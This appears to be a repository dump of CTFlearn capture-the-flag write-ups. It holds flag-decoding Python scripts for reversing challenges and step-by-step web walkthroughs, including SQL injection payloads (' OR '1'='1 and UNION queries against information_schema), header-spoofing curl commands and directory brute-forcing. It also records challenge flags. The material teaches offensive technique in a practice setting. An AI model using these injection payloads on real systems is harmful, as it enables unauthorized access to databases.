/Reverse/Rotterdam Reversing Challenge/Rotterdam_1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rotterdam Reversing Challenge/Rotterdam_1.zip -------------------------------------------------------------------------------- /Reverse/Rotterdam Reversing Challenge/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | prefix = 'CTFlearn{' 3 | kernel = [] 4 | 5 | s = hex(0x2a460d92f5a1f504^0x4b227ff781d59a56)[2:] 6 | param = ''.join(reversed(''.join(map(chr, [int(s[i:i+2],16) for i in range(0,len(s),2)])))) 7 | kernel.append(param) 8 | 9 | s = hex(0x15764ff46 - (0x4f7fb8ade2f2cef6&0xffffffff))[2:] 10 | param = ''.join(reversed(''.join(map(chr, [int(s[i:i+2],16) for i in range(0,len(s),2)])))) 11 | kernel.append(param) 12 | 13 | s = hex(0x4d998c32ff+0x17d4a53553)[2:] 14 | param = ''.join(reversed(''.join(map(chr, [int(s[i:i+2],16) for i in range(0,len(s),2)])))) 15 | kernel.append(param) 16 | 17 | s = hex(0x6a8754493837f7d400a77b9be//0xdeb4fa4d998c32ff)[2:] 18 | param = ''.join(reversed(''.join(map(chr, [int(s[i:i+2],16) for i in range(0,len(s),2)])))) 19 | param = 'B' + param 20 | kernel.append(param) 21 | 22 | s = "6574743157" 23 | param = ''.join(reversed(''.join(map(chr, [int(s[i:i+2],16) for i in range(0,len(s),2)])))) 24 | kernel.append(param) 25 | flag = '_'.join(kernel) 26 | 27 | print("Flag: CTFlearn{" + flag + '}') -------------------------------------------------------------------------------- /Reverse/Rotterdam Reversing Challenge/sources.zip.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rotterdam Reversing Challenge/sources.zip.enc -------------------------------------------------------------------------------- /Reverse/Rzeszow/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rzeszow/Flag.png -------------------------------------------------------------------------------- /Reverse/Rzeszow/Rzeszow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rzeszow/Rzeszow -------------------------------------------------------------------------------- /Reverse/Rzeszow/Rzeszow.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rzeszow/Rzeszow.zip -------------------------------------------------------------------------------- /Reverse/Rzeszow/exploit.py: -------------------------------------------------------------------------------- 1 | flag_comp = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=<>,.?/{}[]\|~' 2 | kernelenc = "W8Hj?1VESL^g4xwcvtW%humtEosd$Fq^dXPvi$#sSEe@o618Zl9.5PFrvC%O_E*LB%Igl8qur9SuLAp4MkK#pRzwJHI*Fn9mUs%mGK^RQKO.G*JFJvV%?VJpCpVF9eJuz5&kB!&_VF5DrF?U?jfm&x^9aC7X2(&cGGzbLbOsSOuBeq*ZT%fpc&9riTDO5X%RuTKI@vCqu#CsTAp$Q9WoXJv96.ySdB2EfMK*$NX?.U*aDrfPQQPhFB9cC6y0hMGvbgjBogSux65gTL#Cm9TQt7nTayu9Vr%thh2GnnikE8JnIwlHfreZep^sZ6IrnXT#qu50Lv.Rd_XPDfgwzWcJ3ISjKM!ftRllVyF$?RE_dcJT5&uKZJ!WsqR853uLzcs!8&VyRuTDsiq#6PdmBNlPI$tPi?wZ5$ACCf9yda!OkP.Dc73Nx.Nt1Rj0O.?P!sZDB^d0LN1qXR31!t?OZ#mm7SfZHPO*4gx1J0nyC^d2EKeq^f4h7mSqaIcMv0ZT@G0M" 3 | flag = '' 4 | 5 | j = 0 6 | while j < 30: 7 | for i in flag_comp: 8 | v12 = j 9 | tmp = ord(i) 10 | if i == kernelenc[((0xbaadf00d+j) % (v12+pow(tmp, 2)+pow(tmp, 3))) & 0x1ff]: 11 | flag += i 12 | j += 3 13 | print("Flag: " + "CTFlearn{" + flag + "}") 14 | -------------------------------------------------------------------------------- /Reverse/Rzeszow/sources.zip.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/Rzeszow/sources.zip.enc -------------------------------------------------------------------------------- /Reverse/The Super Secure Service/Web1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Reverse/The Super Secure Service/Web1.png -------------------------------------------------------------------------------- /Web/AudioEdit/Flag1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/AudioEdit/Flag1.png -------------------------------------------------------------------------------- /Web/AudioEdit/Flag2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/AudioEdit/Flag2.png -------------------------------------------------------------------------------- /Web/AudioEdit/Web1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/AudioEdit/Web1.png -------------------------------------------------------------------------------- /Web/Basic Injection/README.md: -------------------------------------------------------------------------------- 1 | ## Basic Injection 2 | The main idea finding the flag using basic SQL Injections to insecure web page. 3 | 4 | #### Step-1: 5 | After we go to the given URL https://web.ctflearn.com/web4/, we are asked to submit something. 6 | 7 | #### Step-2: 8 | Inspect Element the blank and try to check the code. 9 | 10 | We find a line there. 11 | 12 | `` 13 | 14 | #### Step-3: 15 | When you try all of them, none of them give the flag. So try basic SQL payloads the existing database. 16 | 17 | I tried `' OR '1' = '1` 18 | 19 | I got the following output. 20 | ``` 21 | Name: Luke 22 | Data: I made this problem. 23 | Name: Alec 24 | Data: Steam boys. 25 | Name: Jalen 26 | Data: Pump that iron fool. 27 | Name: Eric 28 | Data: I make cars. 29 | Name: Sam 30 | Data: Thinks he knows SQL. 31 | Name: fl4g__giv3r 32 | Data: th4t_is_why_you_n33d_to_sanitiz3_inputs 33 | Name: snoutpop 34 | Data: jowls 35 | Name: Chunbucket 36 | Data: @datboiiii 37 | ``` 38 | 39 | #### Step-4: 40 | 41 | Finally the flag becomes: 42 | `th4t_is_why_you_n33d_to_sanitiz3_inputs` -------------------------------------------------------------------------------- /Web/Calculat3 M3/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Calculat3 M3/Flag.png -------------------------------------------------------------------------------- /Web/Calculat3 M3/Inspect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Calculat3 M3/Inspect.png -------------------------------------------------------------------------------- /Web/Calculat3 M3/README.md: -------------------------------------------------------------------------------- 1 | ## Calculat3 M3 2 | The main idea finding the flag is OWASP top 10. 3 | 4 | #### Step-1: 5 | After I visited https://web.ctflearn.com/web7/, the calculator is vulnerable to injection. 6 | 7 | #### Step-2: 8 | After I checked Inspect Element, I got the name of the input tag as `expression`. 9 | 10 | 11 | 12 | Please go through this to understand what is happening below and why: 13 | https://owasp.org/www-community/attacks/Command_Injection 14 | 15 | #### Step-3: 16 | So, now I opened [Postman](https://www.postman.com/), and try to change form of Request from `POST` to `GET`. 17 | 18 | 19 | 20 | #### Step-4: 21 | Finally the flag becomes: 22 | `ctf{watch_0ut_f0r_th3_m0ng00s3}` -------------------------------------------------------------------------------- /Web/Don't Bump Your Head(er)/README.md: -------------------------------------------------------------------------------- 1 | ## Don't Bump Your Head(er) 2 | The main idea finding the flag is get flag using curl or Burpsuite. 3 | 4 | #### Step-1: 5 | I visited the given link: http://165.227.106.113/header.php 6 | 7 | 8 | 9 | #### Step-2: 10 | Then I tried to change method of request and see the difference. 11 | `curl -X POST http://165.227.106.113/header.php` 12 | 13 | Output: 14 | ```bash 15 | Sorry, it seems as if your user agent is not correct, in order to access this website. The one you supplied is: curl/7.68.0 16 | 17 | ``` 18 | #### Step-3: 19 | So, now I knew next header change has to be with the user. So I input 20 | `curl -H "User-Agent: Sup3rS3cr3tAg3nt" http://165.227.106.113/header.php` 21 | 22 | Output: 23 | ```bash 24 | Sorry, it seems as if you did not just come from the site, "awesomesauce.com". 25 | 26 | ``` 27 | 28 | #### Step-4: 29 | So, then I tried to visit the website awesomesauce.com, but it is not hosted on web server, it is used rather being referred to http://165.227.106.113/header.php. 30 | 31 | So, I tried to change that also with the header. 32 | `curl -H "User-Agent: Sup3rS3cr3tAg3nt" -H "Referer:awesomesauce.com" http://165.227.106.113/header.php` 33 | 34 | Output: 35 | ```bash 36 | Here is your flag: flag{did_this_m3ss_with_y0ur_h34d} 37 | 38 | ``` 39 | #### Step-5: 40 | Finally the flag becomes: 41 | `flag{did_this_m3ss_with_y0ur_h34d}` -------------------------------------------------------------------------------- /Web/Don't Bump Your Head(er)/Web1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Don't Bump Your Head(er)/Web1.png -------------------------------------------------------------------------------- /Web/Gobustme 👻/README.md: -------------------------------------------------------------------------------- 1 | ## Gobustme 👻 2 | The main idea is to bruteforce directories and files hidden in a website. 3 | 4 | #### Step-1: 5 | We go to the URL https://gobustme.ctflearn.com/ and notice the Ghostbuster theme song, except "Ghostbusters" is replaced with "Gobuster". 6 | 7 | #### Step-2: 8 | The site links [Gobuster](https://www.securitynewspaper.com/2019/11/04/bruteforce-any-website-with-gobuster-step-by-step-guide/) which explains what kind of software it is. 9 | 10 | #### Step-3: 11 | This is a personal preference but [DirBuster](https://tools.kali.org/web-applications/dirbuster) is a GUI while Gobuster is a CLI which makes DirBuster slightly more beginner friendly. 12 | 13 | #### Step-4: 14 | At the bottom of the website, [`common.txt`](./common.txt) is provided. This is a wordlist for possible lists to brute force. 15 | 16 | #### Step-5: 17 | Set up DirBuster by configuring it to go to the website and use `common.txt` as the wordlist. If your computer can handle it, check off "Go Faster". 18 | 19 | 20 | #### Step-6: 21 | After running for a bit, DirBuster will give all the results. 22 | 23 | 24 | #### Step-7: 25 | We can append these results to the end of the website, eg. for `/call` we'd visit https://gobustme.ctflearn.com/call/ 26 | 27 | #### Step-8: 28 | Upon visiting `/hide` we see the message "It was well hidden isn't it? CTFlearn{gh0sbu5t3rs_4ever} 👻" which gives us the flag: 29 | `CTFlearn{gh0sbu5t3rs_4ever}` -------------------------------------------------------------------------------- /Web/Gobustme 👻/results.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Gobustme 👻/results.png -------------------------------------------------------------------------------- /Web/Gobustme 👻/setup.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Gobustme 👻/setup.png -------------------------------------------------------------------------------- /Web/Grid It!/README.md: -------------------------------------------------------------------------------- 1 | ## Grid It! 2 | The main idea of finding the flag is SQL Null byte injection. 3 | 4 | #### Step-1: 5 | I simply had no idea after register/login page. I tried capturing packets through Burpsuite and got some cookie with ID patch and we had to resolve the proper Null Byte SQL Injection to get the USER table for admin password. 6 | 7 | #### Step-2: 8 | So, I looked up for writeup and finally got this: 9 | https://github.com/terjanq/Flag-Capture/tree/master/Practice/CTFLearn/GridIt 10 | 11 | #### Step-3: 12 | Finally, the flag becomes: 13 | `ctflearn{obj3ct_inj3ct1on}` -------------------------------------------------------------------------------- /Web/Inj3ction Time/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Inj3ction Time/Flag.png -------------------------------------------------------------------------------- /Web/Inj3ction Time/README.md: -------------------------------------------------------------------------------- 1 | ## Inj3ction Time 2 | The main idea finding the flag is get flag using progressive SQL exploits to get into database. 3 | 4 | #### Step-1: 5 | After I visited https://web.ctflearn.com/web8/, the following is the list of commands that I input one by one to get the flag. Its progressive and you have to do it by checking corresponding tables and corresponding columns simultaneously. 6 | 7 | #### Step-2: 8 | Commands: 9 | 10 | ```sql 11 | 1 union select 1,2,3,4 # 12 | 1 union select table_name,2,3,4 from information_schema.tables # 13 | ``` 14 | 15 | After these, we find `w0w_y0u_f0und_m3` table to access it. 16 | 17 | #### Step-3: 18 | 19 | ```sql 20 | 1 union select table_name,column_name,3,4 from information_schema.columns # 21 | ``` 22 | This gives us a column called `f0und_m3`. 23 | 24 | This gives us last command. 25 | 26 | ```sql 27 | 1 union select f0und_m3,2,3,4 from w0w_y0u_f0und_m3 # 28 | ``` 29 | 30 | 31 | 32 | #### Step-4: 33 | Finally the flag becomes: 34 | `abctf{uni0n_1s_4_gr34t_c0mm4nd}` -------------------------------------------------------------------------------- /Web/My Blog/Flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/My Blog/Flag.png -------------------------------------------------------------------------------- /Web/My Blog/README.md: -------------------------------------------------------------------------------- 1 | ## My Blog 2 | The main idea finding the flag is navigation in Inspect Element. 3 | 4 | #### Step-1: 5 | 6 | We are given the following message: 7 | 8 | Hi, I'm Noxtal! I have hidden a flag somewhere in my [Cyberworld] 9 | (https://noxtal.com/) (AKA blog)... you may find a good 10 | application for your memory. ;) 11 | 12 | #### Step-2: 13 | So after visiting this website, we are encountered with this webpage: 14 | 15 | 16 | 17 | #### Step-3: 18 | In this message given by author, we can clearly see that it is hinted towards _application_ segment. I am aware that, we have this segment in Inspect Element of the webpage. So I tried that as follows: 19 | 20 | 21 | 22 | #### Step-4: 23 | I found the flag there: 24 | 25 | 26 | 27 | #### Step-5: 28 | Finally the flag becomes: 29 | `flag{n7f_l0c4l_570r463_15n7_53cur3_570r463}` -------------------------------------------------------------------------------- /Web/My Blog/Web1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/My Blog/Web1.png -------------------------------------------------------------------------------- /Web/My Blog/Web2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/My Blog/Web2.png -------------------------------------------------------------------------------- /Web/POST Practice/README.md: -------------------------------------------------------------------------------- 1 | ## POST Practice 2 | The main idea finding the flag using different methods of requests like GET & POST. 3 | 4 | #### Step-1: 5 | After going to URL http://165.227.106.113/post.php, 6 | 7 | I foremost tried to Inspect Element the page to checkout other dependencies of the page. 8 | 9 | I got a credential there: 10 | ` username: admin | password: 71urlkufpsdnlkadsf` 11 | 12 | #### Step-2: 13 | 14 | So here is the idea. I tried to do a POST request to get flag if possible. So I tried with the following command. 15 | 16 | ```bash 17 | curl -X POST http://165.227.106.113/post.php -d "username=admin&password=71urlkufpsdnlkadsf" 18 | ``` 19 | 20 | #### Step-3: 21 | I got the following output: 22 | ```html 23 |

flag{p0st_d4t4_4ll_d4y}

24 | ``` 25 | 26 | #### Step-4: 27 | 28 | Finally the flag becomes: 29 | `flag{p0st_d4t4_4ll_d4y}` 30 | -------------------------------------------------------------------------------- /Web/POST Practice/Web_Page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/POST Practice/Web_Page.png -------------------------------------------------------------------------------- /Web/Prehashbrown/Register.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Prehashbrown/Register.png -------------------------------------------------------------------------------- /Web/Prehashbrown/Search.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Web/Prehashbrown/Search.png -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-hacker 2 | --------------------------------------------------------------------------------